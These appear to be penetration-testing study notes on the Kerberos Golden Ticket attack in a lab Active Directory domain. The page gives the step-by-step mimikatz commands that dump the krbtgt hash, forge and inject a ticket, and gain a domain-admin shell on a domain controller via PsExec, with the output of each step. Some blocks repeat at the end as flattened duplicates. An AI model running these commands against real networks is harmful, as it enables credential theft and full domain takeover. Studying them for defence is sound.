Golden Ticket

Golden Tickets (GTs) are forged Kerberos TGTs created using the password hash of the krbtgt domain account. Possession of this hash allows attackers to impersonate any user, including Domain Admins, across the entire AD domain. This method enables persistent and stealthy privilege escalation without relying on service-specific credentials like Silver Tickets (STs). The krbtgt hash rarely changes, making Golden Tickets a durable attack vector.

In our scenario, we will attemp to move laterally as jen from CLIENT74 to DC1 via PsExec .

# Check jen's access
> PsExec64.exe \\DC1 cmd.exe
...
Couldn't access DC1:
Access is denied.

To extract the NTML hash of the krbtgt account we will log into the DC1 as jeffadmin who is a Domain Admin.

# Extract the NTML hash of the krbtgt account
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
...
User : krbtgt
NTLM : 1693c6cefafffc7af11ef34d1c788f47

Creating the GT and inject it into memory does not require elevated privileges and can also be performed via a host not joined on the domain. We will need the domain SID (which we can obtain via whoami /user) and the krbtgt hash.

# Delete any existing Kerberos tickets (CLIENT74)
mimikatz # kerberos::purge

# Creating a golden ticket
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
...
Golden ticket for 'jen @ corp.com' successfully submitted for current session

# Spawn a new session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

The misc::cmd command in Mimikatz launches a new cmd.exe session that uses the current Mimikatz security context, including any injected Kerberos tickets, ensuring the forged Golden Ticket is applied for authentication in subsequent commands.

# Check jen's access
> PsExec.exe \\dc1 cmd.exe
...

>ipconfig
...
   IPv4 Address. . . . . . . . . . . : 192.168.50.70 # DC1's IP address

> whoami
corp\jen

> whoami /groups
...
CORP\Domain Admins                          Group            S-1-5-21-1987370270-658905905-1781884369-512 Mandatory group, Enabled by default, Enabled group
...
CORP\Enterprise Admins                      Group            S-1-5-21-1987370270-658905905-1781884369-519 Mandatory group, Enabled by default, Enabled group

This attack is a form of Overpass-the-Hash using Kerberos. If PsExec is run using an IP address instead of hostname (forcing NTLM), access fails.

> psexec.exe \\192.168.50.70 cmd.exe
...
Couldn't access 192.168.50.70: 
Access is denied.

PreviousPersistence NextShadow Copies

Last updated 18 days ago

Was this helpful?

# Delete any existing Kerberos tickets (CLIENT74) mimikatz # kerberos::purge # Creating a golden ticket mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt ... Golden ticket for 'jen @ corp.com' successfully submitted for current session # Spawn a new session mimikatz # misc::cmd Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

# Check jen's access > PsExec.exe \\dc1 cmd.exe ... >ipconfig ... IPv4 Address. . . . . . . . . . . : 192.168.50.70 # DC1's IP address > whoami corp\jen > whoami /groups ... CORP\Domain Admins Group S-1-5-21-1987370270-658905905-1781884369-512 Mandatory group, Enabled by default, Enabled group ... CORP\Enterprise Admins Group S-1-5-21-1987370270-658905905-1781884369-519 Mandatory group, Enabled by default, Enabled group